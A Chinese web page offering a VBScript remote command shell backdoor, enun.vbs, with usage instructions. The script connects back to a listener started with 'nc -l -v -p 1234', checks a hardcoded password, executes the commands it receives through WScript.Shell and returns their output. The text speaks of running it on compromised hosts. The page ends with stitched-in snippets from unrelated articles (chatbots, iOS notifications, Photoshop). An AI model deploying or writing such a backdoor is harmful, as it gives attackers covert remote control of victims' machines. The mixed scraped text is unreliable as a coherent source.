VBScript 打造自己的远程CMDShell附使用教程_vbs

请先下载 mswinsck.ocx 与 VB6Controls.reg!

使用方法:

1,控制:nc.exe,执行:nc -l -v -p 1234;

2,目标:cscript.exe enun.vbs IP Port;

3,密码:enun。

几点说明:
1,退出 SHELL,请输入 “exit”,不要用 “Ctrl + C”,这样的话只能等目标重启或手动运行后门才能连接;
2,Windows 7 等环境下普通标准用户也能使用,但是获取的权限相对有限。
3,内部命令及管道使用如下图:

相关下载:
      1,视频演示
      2,vb6controls

enun.vbs 源码:

复制代码 代码如下:

'--------------------------------------------------------------------------
' Copyright (c) lxzzr. All rights reserved.
' ScriptName: enun.vbs
' Creation Date: 28/8/2012
' Last Modified: 28/8/2012
' Author: lxzzr, www.enun.net
' E-mail: lxzzr@21cn.com
' Usage: Cscript.exe //nologo enun.vbs IP Port
'--------------------------------------------------------------------------
On Error Resume Next
Public SocketObj, ExecObj, ShellObj
RemoteHost = Wscript.Arguments(0)
RemotePort = Wscript.Arguments(1)

Do
 Do While (SocketObj.State <> 7)
  WScript.Echo "Try Connect to " & RemoteHost & ":" & RemotePort & " ..."

  Set SocketObj = WScript.CreateObject("MSWinsock.Winsock")
  SocketObj.Protocol = 0
  SocketObj.RemoteHost = RemoteHost
  SocketObj.RemotePort = RemotePort
  SocketObj.Connect

  WScript.Sleep 3000
 Loop

 WScript.Echo "Connected to server."
 SocketObj.SendData SocketObj.LocalHostName & " is Connected, Enter Password: "
 Do While (SocketObj.BytesReceived = 0)
  WScript.Sleep 10
 Loop

 '密码验证
 SocketObj.GetData Authkey, vbString
 If Split(Authkey, chr(10), -1, 1)(0) = "enun" Then

  Set ShellObj = CreateObject("WScript.Shell")
  sRevData = " "
  SocketObj.SendData "Logon Success, Welcome!" & chr(13) & chr(10)

  '循环等待执行命令
  Do
   Set ExecObj = ShellObj.Exec(Split(sRevData, chr(10), -1, 1)(0))

   SocketObj.SendData ExecObj.StdOut.ReadAll
   SocketObj.SendData ExecObj.StdErr.ReadAll

   If sRevData <> "" Then
    SocketObj.SendData chr(10) & "[" & SocketObj.LocalHostName & "@" & "enun]#: "
   End If

   If Left(sRevData, 4) = "exit" Then
    SocketObj.Close
    Exit Do
   End If

   SocketObj.GetData sRevData, vbString
   WScript.Sleep 1000
  Loop
 Else
  LockoutBadCount = LockoutBadCount + 1
  SocketObj.SendData "Logon Failure: Unknown user name or bad password." & chr(13) & chr(10)
  WScript.Sleep 1000
 End If

 '账户策略
 If (LockoutBadCount > 3) Then
  SocketObj.SendData "The User Account is locked!" & chr(13) & chr(10)
  WScript.Sleep 1000
  SocketObj.Close
  LockoutBadCount = 0
  WScript.Sleep 600*1000
 End If
Loop

时间: 2024-10-22 05:22:48

VBScript 打造自己的远程CMDShell附使用教程_vbs的相关文章

VBScript 打造自己的远程CMDShell附使用教程

这个cmdshell需要结合nc进行配合使用,现在肉鸡上执行cmdshell然后在本地上面运行nc,注意看下面的参数   请先下载 mswinsck.ocx 与 VB6Controls.reg! 使用方法: 1,控制:nc.exe,执行:nc -l -v -p 1234: 2,目标:cscript.exe enun.vbs IP Port: 3,密码:enun. 几点说明: 1,退出 SHELL,请输入 "exit",不要用 "Ctrl + C",这样的话只能等目标

三步轻松打造微信聊天机器人(附源码)

 最近微信公众平台开发是热门,我也跟风做了一个陪聊的公众号.       其实类似的自动回话程序早就有了,比如前一阵很火的小黄鸡(还是小黄鸭来着?).但尽管是跟风,也要体现一些不同.别人做的都是中文陪聊,咱就来做个英语陪聊.       不管是中文还是英文,做起来都一样,都是利用网络上的接口.或者你也可以试着自己开发一个陪聊程序.       随便在网上搜了一个英语聊天机器人的网址:http://www.pandorabots.com/pandora/talk?botid=f5d922d97e3

iOS10最新实现远程通知的开发教程详解_IOS

一.iOS推送通知简介 众所周知苹果的推送通知从iOS3开始出现, 每一年都会更新一些新的用法. 譬如iOS7出现的Silent remote notifications(远程静默推送), iOS8出现的Category(分类, 也可称之为快捷回复), iOS9出现的Text Input action(文本框快捷回复). 而在iOS10, 苹果可谓是大刀阔斧般的, 对远程通知和本地通知进行了大范围的更新. iOS10推出了全新的UserNotifications框架(iOS10之前从属于UIKi

打造安全的远程桌面连接

关于安装了Windows XP和Server 2003的远程桌面(Remot Desktop)的安全重点,这里有一个方便易用的方法来保障远程桌面(Remot Desktop)的安全. 远程桌面(Remot Desktop)通常是运行在3389端口.这是默认设置的远程桌面客户端连接端口,并且也是黑客们扫描来发现的打开的远程桌面连接端口.通过改变端口号,能让你从根本上隐藏远程桌面连接,避开那些扫描3389端口的黑客,并且没有人将会通过远程桌面连接到你的计算机,除非他们知道远程桌面运行在哪个端口号上.

吴恩达,李开复等专家组队打造2017AI趋势报告(附报告全文和完整数据包)

以斯坦福大学为首的专家团队推出的人工智能指数(AI Index)正在追踪AI这个新兴领域,并在近日发布了2017重磅年度报告. 2000年来,活跃的AI创业公司增长了14倍.风险投资在这一时期增长了6倍数. 过去20年,AI领域的学术发布增长了9倍,注册课程也在猛涨.例如,斯坦福的AI相关机器学习课程导论课程在过去30年中,注册人数增长了45倍之多. 近日,由斯坦福大学主导,包括吴恩达.李开复等一众大咖齐力打造的2017AI趋势报告重磅发布. 吴恩达本人也在刚刚发推特支持报告,提及了报告中有趣结

远程桌面RemoteDesktopManager使用教程

有关远程桌面的工具比较多,我今天来介绍这个工具很不错的. RemoteDesktopManager是一款国外的软件,但是又中文的哦,我一直在使用感觉很不错呢. 我们可以在RemoteDesktopManager官网: http://remotedesktopmanager.com/,下载最新版本. 下载完毕后,我们直接进行安装.RemoteDesktopManager的安装,和我们平时使用的软件安装方法是一样的,下一步下一步即可. 安装完毕后的界面,如下图示: 双击打开RemoteDesktop

PhotoShop图层样式打造复古大气皇族金字效果教程

教大家用PhotoShop打造复古大气皇族金字效果,很简单的,主要是图层样式的设置,喜欢的同学可以跟着做一下! photoshop教程效果图: 1.新建700*500大小,72px大小文档,给背景层解锁,设置图层样式如下: 分类: PS文字教程

Photoshop打造夏季美女照片柔美的黄褐色教程

图片以黄绿及紫红色为主.我们需要的颜色是黄褐色,因此调色的时候只需要把背景部分的黄绿色转为黄褐色,再把紫色转为橙红色即可.暗部及高光可以按照需要稍微渲染一下. 原图 <点小图查看大图> 最终效果 1.打开素材图片,创建色相/饱和度调整图层,对绿色进行调整,参数设置如图1,效果如图2.这一步把图片中的绿色转为黄绿色. <图1> <图2> 相关教程: 利用PS通道替换打造古典黄褐色人物照片 PhotoShop调出质感黄褐色抽烟女孩效果教程 Photoshop调出草地婚片漂亮

PS CS6打造缤纷水果3D立体文字效果教程

本期的PS教程中,将向您展示打造"水果风格3D字体"的技法.我们将使用一些滤镜来为文字加入更多的效果. 这属于中级教程.教程使用版本为CS6. 开始之前,我们先来看看最终效果是怎么样的: 需要的素材下载: 时尚字体:Font 水果元素:Fruit Stock 步骤一 创建新文件,大小1400px * 800px,然后设置淡蓝色背景 创建新图层,使用白色柔和的笔刷工具在画布中心点上白点. 新图层的混合模式设置为"柔光" 效果如下 步骤2 通过这一步,加入3d文字效果,